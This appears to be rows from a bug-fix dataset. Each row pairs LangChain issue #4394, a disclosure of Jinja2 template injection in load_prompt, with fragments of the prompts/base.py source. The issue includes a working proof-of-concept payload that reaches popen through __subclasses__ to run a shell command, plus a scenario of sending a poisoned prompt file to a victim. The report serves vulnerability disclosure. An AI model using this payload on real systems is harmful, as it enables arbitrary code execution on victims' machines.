- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | try:
from jinja2 import Environment, meta
except ImportError:
raise ImportError(
"jinja2 not installed, which is needed to use the jinja2_formatter. "
"Please install it with `pip install jinja2`."
)
env = Environment()
ast = env.parse(template)
variables = meta.find_undeclared_variables(ast)
return variables
DEFAULT_FORMATTER_MAPPING: Dict[str, Callable] = {
"f-string": formatter.format,
"jinja2": jinja2_formatter,
}
DEFAULT_VALIDATOR_MAPPING: Dict[str, Callable] = {
"f-string": formatter.validate_input_variables,
"jinja2": validate_jinja2,
}
def check_valid_template( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | template: str, template_format: str, input_variables: List[str]
) -> None:
"""Check that template string is valid."""
if template_format not in DEFAULT_FORMATTER_MAPPING:
valid_formats = list(DEFAULT_FORMATTER_MAPPING)
raise ValueError(
f"Invalid template format. Got `{template_format}`;"
f" should be one of {valid_formats}"
)
try:
validator_func = DEFAULT_VALIDATOR_MAPPING[template_format]
validator_func(template, input_variables)
except KeyError as e:
raise ValueError(
"Invalid prompt schema; check for mismatched or missing input parameters. "
+ str(e)
)
class StringPromptValue(PromptValue): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | """String prompt value."""
text: str
"""Prompt text."""
def to_string(self) -> str:
"""Return prompt as string."""
return self.text
def to_messages(self) -> List[BaseMessage]:
"""Return prompt as messages."""
return [HumanMessage(content=self.text)]
class StringPromptTemplate(BasePromptTemplate, ABC):
"""String prompt that exposes the format method, returning a prompt."""
def format_prompt(self, **kwargs: Any) -> PromptValue:
"""Create Chat Messages."""
return StringPromptValue(text=self.format(**kwargs)) |
Subsets and Splits